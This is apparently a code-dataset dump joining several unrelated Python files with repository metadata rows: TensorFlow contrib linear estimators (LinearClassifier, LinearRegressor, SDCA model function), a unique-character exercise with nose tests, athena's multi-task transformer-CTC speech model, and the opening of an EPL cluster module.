* feature_columns: An iterable containing all the feature columns used by
the model.
* optimizer: An `SDCAOptimizer` instance.
* weight_column_name: A string defining the weight feature column, or
None if there are no weights.
* update_weights_hook: A `SessionRunHook` object or None. Used to update
model weights.
Returns:
A `ModelFnOps` instance.
Raises:
ValueError: If `optimizer` is not an `SDCAOptimizer` instance.
ValueError: If the type of head is neither `_BinarySvmHead`, nor
`_RegressionHead` nor `_MultiClassHead`.
ValueError: If mode is not any of the `ModeKeys`.
"""
head = params["head"]
feature_columns = params["feature_columns"]
optimizer = params["optimizer"]
weight_column_name = params["weight_column_name"]
update_weights_hook = params.get("update_weights_hook", None)
if not isinstance(optimizer, sdca_optimizer.SDCAOptimizer):
raise ValueError("Optimizer must be of type SDCAOptimizer")
if isinstance(head, head_lib._BinarySvmHead): # pylint: disable=protected-access
loss_type = "hinge_loss"
elif isinstance(head, head_lib._BinaryLogisticHead): # pylint: disable=protected-access
loss_type = "logistic_loss"
elif isinstance(head, head_lib._RegressionHead): # pylint: disable=protected-access
assert head.logits_dimension == 1, ("SDCA only applies for "
"logits_dimension=1.")
loss_type = "squared_loss"
else:
raise ValueError("Unsupported head type: {}".format(head))
parent_scope = "linear"
with variable_scope.variable_scope(
values=features.values(),
name_or_scope=parent_scope,
partitioner=optimizer.partitioner) as scope:
features = features.copy()
features.update(layers.transform_features(features, feature_columns))
logits, columns_to_variables, bias = (
layers.weighted_sum_from_feature_columns(
columns_to_tensors=features,
feature_columns=feature_columns,
num_outputs=1,
scope=scope))
_add_bias_column(feature_columns, features, bias, columns_to_variables)
def _train_op_fn(unused_loss):
global_step = training_util.get_global_step()
sdca_model, train_op = optimizer.get_train_step(columns_to_variables,
weight_column_name,
loss_type, features,
labels, global_step)
if update_weights_hook is not None:
update_weights_hook.set_parameters(sdca_model, train_op)
return train_op
model_fn_ops = head.create_model_fn_ops(
features=features,
labels=labels,
mode=mode,
train_op_fn=_train_op_fn,
logits=logits)
if update_weights_hook is not None:
return model_fn_ops._replace(
training_chief_hooks=(model_fn_ops.training_chief_hooks +
[update_weights_hook]))
return model_fn_ops
# Ensures consistency with LinearComposableModel.
def _get_default_optimizer(feature_columns):
learning_rate = min(_LEARNING_RATE, 1.0 / math.sqrt(len(feature_columns)))
return train.FtrlOptimizer(learning_rate=learning_rate)
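# Worked example of the rule above (hypothetical column count): with 100
# feature columns the default Ftrl rate is min(0.2, 1/sqrt(100)) = 0.1.
def _demo_default_learning_rate(num_columns=100):
  return min(_LEARNING_RATE, 1.0 / math.sqrt(num_columns))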
class _SdcaUpdateWeightsHook(session_run_hook.SessionRunHook):
"""SessionRunHook to update and shrink SDCA model weights."""
def __init__(self):
pass
def set_parameters(self, sdca_model, train_op):
self._sdca_model = sdca_model
self._train_op = train_op
def begin(self):
"""Construct the update_weights op.
The op is implicitly added to the default graph.
"""
self._update_op = self._sdca_model.update_weights(self._train_op)
def before_run(self, run_context):
"""Return the update_weights op so that it is executed during this run."""
return session_run_hook.SessionRunArgs(self._update_op)
class LinearClassifier(estimator.Estimator):
"""Linear classifier model.
THIS CLASS IS DEPRECATED. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for general migration instructions.
Train a linear model to classify instances into one of multiple possible
classes. When number of possible classes is 2, this is binary classification.
Example:
```python
sparse_column_a = sparse_column_with_hash_bucket(...)
sparse_column_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_x_sparse_feature_b = crossed_column(...)
# Estimator using the default optimizer.
estimator = LinearClassifier(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b])
# Or estimator using the FTRL optimizer with regularization.
estimator = LinearClassifier(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
optimizer=tf.train.FtrlOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001
))
# Or estimator using the SDCAOptimizer.
estimator = LinearClassifier(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
optimizer=tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id',
num_loss_partitions=...,
symmetric_l2_regularization=2.0
))
# Input builders
def input_fn_train: # returns x, y (where y represents label's class index).
...
def input_fn_eval: # returns x, y (where y represents label's class index).
...
def input_fn_predict: # returns x, None.
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
# predict_classes returns class indices.
estimator.predict_classes(input_fn=input_fn_predict)
```
If the user specifies `label_keys` in constructor, labels must be strings from
the `label_keys` vocabulary. Example:
```python
label_keys = ['label0', 'label1', 'label2']
estimator = LinearClassifier(
n_classes=n_classes,
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
label_keys=label_keys)
def input_fn_train: # returns x, y (where y is one of label_keys).
pass
estimator.fit(input_fn=input_fn_train)
def input_fn_eval: # returns x, y (where y is one of label_keys).
pass
estimator.evaluate(input_fn=input_fn_eval)
def input_fn_predict: # returns x, None
# predict_classes returns one of label_keys.
estimator.predict_classes(input_fn=input_fn_predict)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
* if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* for each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn`, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self, # _joint_weight pylint: disable=invalid-name
feature_columns,
model_dir=None,
n_classes=2,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
enable_centered_bias=False,
_joint_weight=False,
config=None,
feature_engineering_fn=None,
label_keys=None):
"""Construct a `LinearClassifier` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
n_classes: number of label classes. Default is binary classification.
Note that class labels are integers representing the class index (i.e.
values from 0 to n_classes-1). For arbitrary label values (e.g. string
labels), convert to class indices first.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: The optimizer used to train the model. If specified, it should
be either an instance of `tf.Optimizer` or the SDCAOptimizer. If `None`,
the Ftrl optimizer will be used.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
_joint_weight: If True, the weights for all columns will be stored in a
single (possibly partitioned) variable. It's more efficient, but it's
incompatible with SDCAOptimizer, and requires all feature columns are
sparse and use the 'sum' combiner.
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and
returns features and labels which will be fed
into the model.
label_keys: Optional list of strings with size `[n_classes]` defining the
label vocabulary. Only supported for `n_classes` > 2.
Returns:
A `LinearClassifier` estimator.
Raises:
ValueError: if n_classes < 2.
ValueError: if enable_centered_bias=True and optimizer is SDCAOptimizer.
"""
if (isinstance(optimizer, sdca_optimizer.SDCAOptimizer) and
enable_centered_bias):
raise ValueError("enable_centered_bias is not supported with SDCA")
self._feature_columns = tuple(feature_columns or [])
assert self._feature_columns
chief_hook = None
head = head_lib.multi_class_head(
n_classes,
weight_column_name=weight_column_name,
enable_centered_bias=enable_centered_bias,
label_keys=label_keys)
params = {
"head": head,
"feature_columns": feature_columns,
"optimizer": optimizer,
}
if isinstance(optimizer, sdca_optimizer.SDCAOptimizer):
assert not _joint_weight, ("_joint_weight is incompatible with the"
" SDCAOptimizer")
assert n_classes == 2, "SDCA only applies to binary classification."
model_fn = sdca_model_fn
# The model_fn passes the model parameters to the chief_hook. We then use
# the hook to update weights and shrink step only on the chief.
chief_hook = _SdcaUpdateWeightsHook()
params.update({
"weight_column_name": weight_column_name,
"update_weights_hook": chief_hook,
})
else:
model_fn = _linear_model_fn
params.update({
"gradient_clip_norm": gradient_clip_norm,
"joint_weights": _joint_weight,
})
super(LinearClassifier, self).__init__(
model_fn=model_fn,
model_dir=model_dir,
config=config,
params=params,
feature_engineering_fn=feature_engineering_fn)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
@deprecated_arg_values(
"2017-03-01",
"Please switch to predict_classes, or set `outputs` argument.",
outputs=None)
def predict(self, x=None, input_fn=None, batch_size=None, outputs=None,
as_iterable=True):
"""Returns predictions for given features.
By default, returns predicted classes. But this default will be dropped
soon. Users should either pass `outputs`, or call `predict_classes` method.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
outputs: list of `str`, name of the output to predict.
If `None`, returns classes.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted classes with shape [batch_size] (or an iterable
of predicted classes if as_iterable is True). Each predicted class is
represented by its class index (i.e. integer from 0 to n_classes-1).
If `outputs` is set, returns a dict of predictions.
"""
if not outputs:
return self.predict_classes(
x=x,
input_fn=input_fn,
batch_size=batch_size,
as_iterable=as_iterable)
return super(LinearClassifier, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=outputs,
as_iterable=as_iterable)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_classes(self, x=None, input_fn=None, batch_size=None,
as_iterable=True):
"""Returns predicted classes for given features.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted classes with shape [batch_size] (or an iterable
of predicted classes if as_iterable is True). Each predicted class is
represented by its class index (i.e. integer from 0 to n_classes-1).
"""
key = prediction_key.PredictionKey.CLASSES
preds = super(LinearClassifier, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return _as_iterable(preds, output=key)
return preds[key]
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_proba(self, x=None, input_fn=None, batch_size=None,
as_iterable=True):
"""Returns predicted probabilities for given features.
Args:
x: features.
input_fn: Input function. If set, x and y must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted probabilities with shape [batch_size, n_classes]
(or an iterable of predicted probabilities if as_iterable is True).
"""
key = prediction_key.PredictionKey.PROBABILITIES
preds = super(LinearClassifier, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return _as_iterable(preds, output=key)
return preds[key]
@deprecated("2017-03-25", "Please use Estimator.export_savedmodel() instead.")
def export(self,
export_dir,
input_fn=None,
input_feature_key=None,
use_deprecated_input_fn=True,
signature_fn=None,
default_batch_size=1,
exports_to_keep=None):
"""See BaseEstimator.export."""
def default_input_fn(unused_estimator, examples):
return layers.parse_feature_columns_from_examples(
examples, self._feature_columns)
return super(LinearClassifier, self).export(
export_dir=export_dir,
input_fn=input_fn or default_input_fn,
input_feature_key=input_feature_key,
use_deprecated_input_fn=use_deprecated_input_fn,
signature_fn=(signature_fn or
export.classification_signature_fn_with_prob),
prediction_key=prediction_key.PredictionKey.PROBABILITIES,
default_batch_size=default_batch_size,
exports_to_keep=exports_to_keep)
class LinearRegressor(estimator.Estimator):
"""Linear regressor model.
THIS CLASS IS DEPRECATED. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for general migration instructions.
Train a linear regression model to predict label value given observation of
feature values.
Example:
```python
sparse_column_a = sparse_column_with_hash_bucket(...)
sparse_column_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_x_sparse_feature_b = crossed_column(...)
estimator = LinearRegressor(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b])
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a KeyError:
* if `weight_column_name` is not `None`:
key=weight_column_name, value=a `Tensor`
* for column in `feature_columns`:
- if isinstance(column, `SparseColumn`):
key=column.name, value=a `SparseTensor`
- if isinstance(column, `WeightedSparseColumn`):
{key=id column name, value=a `SparseTensor`,
key=weight column name, value=a `SparseTensor`}
- if isinstance(column, `RealValuedColumn`):
key=column.name, value=a `Tensor`
"""
def __init__(self, # _joint_weights: pylint: disable=invalid-name
feature_columns,
model_dir=None,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
enable_centered_bias=False,
label_dimension=1,
_joint_weights=False,
config=None,
feature_engineering_fn=None):
"""Construct a `LinearRegressor` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: An instance of `tf.Optimizer` used to train the model. If
`None`, will use an Ftrl optimizer.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
label_dimension: Number of regression targets per example. This is the
size of the last dimension of the labels and logits `Tensor` objects
(typically, these have shape `[batch_size, label_dimension]`).
_joint_weights: If True use a single (possibly partitioned) variable to
store the weights. It's faster, but requires all feature columns are
sparse and have the 'sum' combiner. Incompatible with SDCAOptimizer.
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and
returns features and labels which will be fed
into the model.
Returns:
A `LinearRegressor` estimator.
"""
self._feature_columns = tuple(feature_columns or [])
assert self._feature_columns
chief_hook = None
if (isinstance(optimizer, sdca_optimizer.SDCAOptimizer) and
enable_centered_bias):
enable_centered_bias = False
logging.warning("centered_bias is not supported with SDCA, "
"please disable it explicitly.")
head = head_lib.regression_head(
weight_column_name=weight_column_name,
label_dimension=label_dimension,
enable_centered_bias=enable_centered_bias)
params = {
"head": head,
"feature_columns": feature_columns,
"optimizer": optimizer,
}
if isinstance(optimizer, sdca_optimizer.SDCAOptimizer):
assert label_dimension == 1, "SDCA only applies for label_dimension=1."
assert not _joint_weights, ("_joint_weights is incompatible with"
" SDCAOptimizer.")
model_fn = sdca_model_fn
# The model_fn passes the model parameters to the chief_hook. We then use
# the hook to update weights and shrink step only on the chief.
chief_hook = _SdcaUpdateWeightsHook()
params.update({
"weight_column_name": weight_column_name,
"update_weights_hook": chief_hook,
})
else:
model_fn = _linear_model_fn
params.update({
"gradient_clip_norm": gradient_clip_norm,
"joint_weights": _joint_weights,
})
super(LinearRegressor, self).__init__(
model_fn=model_fn,
model_dir=model_dir,
config=config,
params=params,
feature_engineering_fn=feature_engineering_fn)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
@deprecated_arg_values(
"2017-03-01",
"Please switch to predict_scores, or set `outputs` argument.",
outputs=None)
def predict(self, x=None, input_fn=None, batch_size=None, outputs=None,
as_iterable=True):
"""Returns predictions for given features.
By default, returns predicted scores. But this default will be dropped
soon. Users should either pass `outputs`, or call `predict_scores` method.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
outputs: list of `str`, name of the output to predict.
If `None`, returns scores.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted scores (or an iterable of predicted scores if
as_iterable is True). If `label_dimension == 1`, the shape of the output
is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`.
If `outputs` is set, returns a dict of predictions.
"""
if not outputs:
return self.predict_scores(
x=x,
input_fn=input_fn,
batch_size=batch_size,
as_iterable=as_iterable)
return super(LinearRegressor, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=outputs,
as_iterable=as_iterable)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_scores(self, x=None, input_fn=None, batch_size=None,
as_iterable=True):
"""Returns predicted scores for given features.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted scores (or an iterable of predicted scores if
as_iterable is True). If `label_dimension == 1`, the shape of the output
is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`.
"""
key = prediction_key.PredictionKey.SCORES
preds = super(LinearRegressor, self).predict(
x=x,
input_fn=input_fn,
batch_size=batch_size,
outputs=[key],
as_iterable=as_iterable)
if as_iterable:
return _as_iterable(preds, output=key)
return preds[key]
@deprecated("2017-03-25", "Please use Estimator.export_savedmodel() instead.")
def export(self,
export_dir,
input_fn=None,
input_feature_key=None,
use_deprecated_input_fn=True,
signature_fn=None,
default_batch_size=1,
exports_to_keep=None):
"""See BaseEstimator.export."""
def default_input_fn(unused_estimator, examples):
return layers.parse_feature_columns_from_examples(
examples, self._feature_columns)
return super(LinearRegressor, self).export(
export_dir=export_dir,
input_fn=input_fn or default_input_fn,
input_feature_key=input_feature_key,
use_deprecated_input_fn=use_deprecated_input_fn,
signature_fn=(signature_fn or export.regression_signature_fn),
prediction_key=prediction_key.PredictionKey.SCORES,
default_batch_size=default_batch_size,
exports_to_keep=exports_to_keep)
class LinearEstimator(estimator.Estimator):
"""Linear model with user specified head.
THIS CLASS IS DEPRECATED. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for general migration instructions.
Train a generalized linear model to predict label value given observation of
feature values.
Example:
To do poisson regression,
```python
sparse_column_a = sparse_column_with_hash_bucket(...)
sparse_column_b = sparse_column_with_hash_bucket(...)
sparse_feature_a_x_sparse_feature_b = crossed_column(...)
estimator = LinearEstimator(
feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
head=head_lib.poisson_regression_head())
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a KeyError:
* if `weight_column_name` is not `None`:
key=weight_column_name, value=a `Tensor`
* for column in `feature_columns`:
- if isinstance(column, `SparseColumn`):
key=column.name, value=a `SparseTensor`
- if isinstance(column, `WeightedSparseColumn`):
{key=id column name, value=a `SparseTensor`,
key=weight column name, value=a `SparseTensor`}
- if isinstance(column, `RealValuedColumn`):
key=column.name, value=a `Tensor`
"""
def __init__(self, # _joint_weights: pylint: disable=invalid-name
feature_columns,
head,
model_dir=None,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
_joint_weights=False,
config=None,
feature_engineering_fn=None):
"""Construct a `LinearEstimator` object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
head: An instance of _Head class.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: An instance of `tf.Optimizer` used to train the model. If
`None`, will use an Ftrl optimizer.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
_joint_weights: If True use a single (possibly partitioned) variable to
store the weights. It's faster, but requires all feature columns are
sparse and have the 'sum' combiner. Incompatible with SDCAOptimizer.
config: `RunConfig` object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
labels which are the output of `input_fn` and
returns features and labels which will be fed
into the model.
Returns:
A `LinearEstimator` estimator.
Raises:
ValueError: if optimizer is not supported, e.g., SDCAOptimizer
"""
assert feature_columns
if isinstance(optimizer, sdca_optimizer.SDCAOptimizer):
raise ValueError("LinearEstimator does not support SDCA optimizer.")
params = {
"head": head,
"feature_columns": feature_columns,
"optimizer": optimizer,
"gradient_clip_norm": gradient_clip_norm,
"joint_weights": _joint_weights,
}
super(LinearEstimator, self).__init__(
model_fn=_linear_model_fn,
model_dir=model_dir,
config=config,
params=params,
feature_engineering_fn=feature_engineering_fn)
| 40.660224 | 96 | 0.680577 |
0d5d0ca486428bc658f33f55e1bcd1cd2ea77f3b | 7,095 | py | Python | athena/models/mtl_seq2seq.py | wgfi110/athena | e704884ec6a3a947769d892aa267578038e49ecb | [
"Apache-2.0"
] | 791 | 2019-12-22T03:09:04.000Z | 2022-03-26T01:57:42.000Z | athena/models/mtl_seq2seq.py | wgfi110/athena | e704884ec6a3a947769d892aa267578038e49ecb | [
"Apache-2.0"
] | 198 | 2019-12-22T03:06:27.000Z | 2022-03-29T02:57:59.000Z | athena/models/mtl_seq2seq.py | wgfi110/athena | e704884ec6a3a947769d892aa267578038e49ecb | [
"Apache-2.0"
] | 194 | 2019-12-24T03:59:29.000Z | 2022-03-25T02:44:51.000Z | # coding=utf-8
# Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li; Dongwei Jiang; Wubo Li
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Only support eager mode and TF>=2.0.0
# pylint: disable=no-member, invalid-name, relative-beyond-top-level
# pylint: disable=too-many-locals, too-many-statements, too-many-arguments, too-many-instance-attributes
""" a implementation of multi-task model with attention and ctc loss """
import io
import tensorflow as tf
from tensorflow.keras.layers import Dense
from .base import BaseModel
from ..loss import CTCLoss
from ..metrics import CTCAccuracy
from .speech_transformer import SpeechTransformer, SpeechTransformer2
from ..utils.hparam import register_and_parse_hparams
class MtlTransformerCtc(BaseModel):
""" In speech recognition, adding CTC loss to Attention-based seq-to-seq model is known to
help convergence. It usually gives better results than using attention alone.
"""
SUPPORTED_MODEL = {
"speech_transformer": SpeechTransformer,
"speech_transformer2": SpeechTransformer2,
}
default_config = {
"model": "speech_transformer",
"model_config": {"return_encoder_output": True},
"mtl_weight": 0.5
}
def __init__(self, data_descriptions, config=None):
super().__init__()
self.num_class = data_descriptions.num_class + 1
self.sos = self.num_class - 1
self.eos = self.num_class - 1
self.hparams = register_and_parse_hparams(self.default_config, config, cls=self.__class__)
self.loss_function = CTCLoss(blank_index=-1)
self.metric = CTCAccuracy()
self.model = self.SUPPORTED_MODEL[self.hparams.model](
data_descriptions, self.hparams.model_config
)
self.time_propagate = self.model.time_propagate
self.decoder = Dense(self.num_class)
# for deployment
self.deploy_encoder = None
self.deploy_decoder = None
# for WFST
self.vocab = {}
if data_descriptions.hparams.text_config["type"] == "vocab":
for line in io.open(data_descriptions.hparams.text_config["model"], 'r', encoding='utf-8').readlines():
char, idx = line.strip().split()[0], line.strip().split()[1]
self.vocab[char] = int(idx)
# we need dict of words for WFST decoding
if data_descriptions.hparams.words is not None:
self.words = []
for line in io.open(data_descriptions.hparams.words, 'r', encoding='utf-8').readlines():
word = line.strip().split()[0]
self.words.append(word)
def call(self, samples, training=None):
""" call function in keras layers """
attention_logits, encoder_output = self.model(samples, training=training)
ctc_logits = self.decoder(encoder_output, training=training)
return attention_logits, ctc_logits
def get_loss(self, outputs, samples, training=None):
""" get loss used for training """
attention_logits, ctc_logits = outputs
logit_length = self.compute_logit_length(samples)
extra_loss = self.loss_function(ctc_logits, samples, logit_length)
self.metric(ctc_logits, samples, logit_length)
main_loss, metrics = self.model.get_loss(attention_logits, samples, training=training)
mtl_weight = self.hparams.mtl_weight
loss = mtl_weight * main_loss + (1.0 - mtl_weight) * extra_loss
metrics[self.metric.name] = self.metric.result()
return loss, metrics
def compute_logit_length(self, samples):
""" compute the logit length """
return self.model.compute_logit_length(samples)
def reset_metrics(self):
""" reset the metrics """
self.metric.reset_states()
self.model.reset_metrics()
def restore_from_pretrained_model(self, pretrained_model, model_type=""):
""" A more general-purpose interface for pretrained model restoration
Args:
pretrained_model: checkpoint path of mpc model
model_type: the type of pretrained model to restore
"""
self.model.restore_from_pretrained_model(pretrained_model, model_type)
def decode(self, samples, hparams, decoder):
"""
Initialization of the model for decoding,
decoder is called here to create predictions
Args:
samples: the data source to be decoded
hparams: decoding configs are included here
decoder: it contains the main decoding operations
        Returns:
predictions: the corresponding decoding results
"""
encoder_output, input_mask = self.model.decode(samples, hparams, decoder, return_encoder=True)
# init op
last_predictions = tf.ones([1], dtype=tf.int32) * self.sos
history_predictions = tf.TensorArray(
tf.int32, size=1, dynamic_size=True, clear_after_read=False
)
history_predictions.write(0, last_predictions)
history_predictions = history_predictions.stack()
init_cand_states = [history_predictions]
step = 0
if hparams.decoder_type == "beam_search_decoder" and hparams.ctc_weight != 0 and decoder.ctc_scorer is not None:
ctc_logits = self.decoder(encoder_output, training=False)
ctc_logits = tf.math.log(tf.nn.softmax(ctc_logits))
init_cand_states = decoder.ctc_scorer.initial_state(init_cand_states, ctc_logits)
if hparams.decoder_type == "beam_search_decoder":
predictions = decoder(
history_predictions, init_cand_states, step, (encoder_output, input_mask)
)
elif hparams.decoder_type == "wfst_decoder":
initial_packed_states = (0,) # this is basically decoding step
decoder.decode((encoder_output, input_mask), initial_packed_states, self.model.inference_one_step)
words_prediction_id = decoder.get_best_path()
words_prediction = ''.join([self.words[int(idx)] for idx in words_prediction_id])
predictions = [self.vocab[prediction] for prediction in words_prediction]
predictions = tf.constant([predictions])
predictions = tf.cast(predictions, tf.int64)
return predictions
def deploy(self):
""" deployment function """
self.model.deploy()
self.deploy_encoder = self.model.deploy_encoder
self.deploy_decoder = self.model.deploy_decoder
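# Worked example of the weighting in get_loss above (numbers are made up):
# with mtl_weight = 0.5, an attention loss of 2.0 and a CTC loss of 4.0 give
# 0.5 * 2.0 + (1 - 0.5) * 4.0 = 3.0.
def _demo_mtl_loss(main_loss=2.0, extra_loss=4.0, mtl_weight=0.5):
    return mtl_weight * main_loss + (1.0 - mtl_weight) * extra_loss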
| 43.262195 | 120 | 0.671177 |
bcd2cdeb33a42753f9f0458189e936d2a041f155 | 591 | py | Python | Udemy/UniqueCharacter.py | batumoglu/Python_Algorithms | f586f386693eaddb64d6a654a89af177fd0e838f | [
"MIT"
] | null | null | null | Udemy/UniqueCharacter.py | batumoglu/Python_Algorithms | f586f386693eaddb64d6a654a89af177fd0e838f | [
"MIT"
] | null | null | null | Udemy/UniqueCharacter.py | batumoglu/Python_Algorithms | f586f386693eaddb64d6a654a89af177fd0e838f | [
"MIT"
] | null | null | null | def uni_char1(s):
return len(set(s)) == len(s)
def uni_char2(s):
chars = set()
for letter in s:
if letter in chars:
return False
else:
chars.add(letter)
return True
from nose.tools import assert_equal
class TestUnique(object):
def test(self, sol):
assert_equal(sol(''), True)
assert_equal(sol('goo'), False)
assert_equal(sol('abcdefg'), True)
print('ALL TEST CASES PASSED')
if __name__ == "__main__":
t = TestUnique()
t.test(uni_char1)
t = TestUnique()
t.test(uni_char2) | 21.888889 | 42 | 0.57868 |
3b940402ffaa327c1c58ff451abbdf588c06f0c9 | 16,334 | py | Python | epl/cluster.py | Fazziekey/EasyParallelLibrary | 75a817aa83fbde109f1698e14e02cbf1ab5c934c | [
"Apache-2.0"
] | 1 | 2022-03-09T07:40:47.000Z | 2022-03-09T07:40:47.000Z | python/epl/cluster.py | chenyang472043503/EasyParallelLibrary | cd2873fe04c86c62e55418129ba2f1dc83d222b4 | [
"Apache-2.0"
] | null | null | null | python/epl/cluster.py | chenyang472043503/EasyParallelLibrary | cd2873fe04c86c62e55418129ba2f1dc83d222b4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Cluster for grouping devices into serveral slices."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import numpy as np
from tensorflow.python.client import device_lib
from tensorflow.python.platform import tf_logging
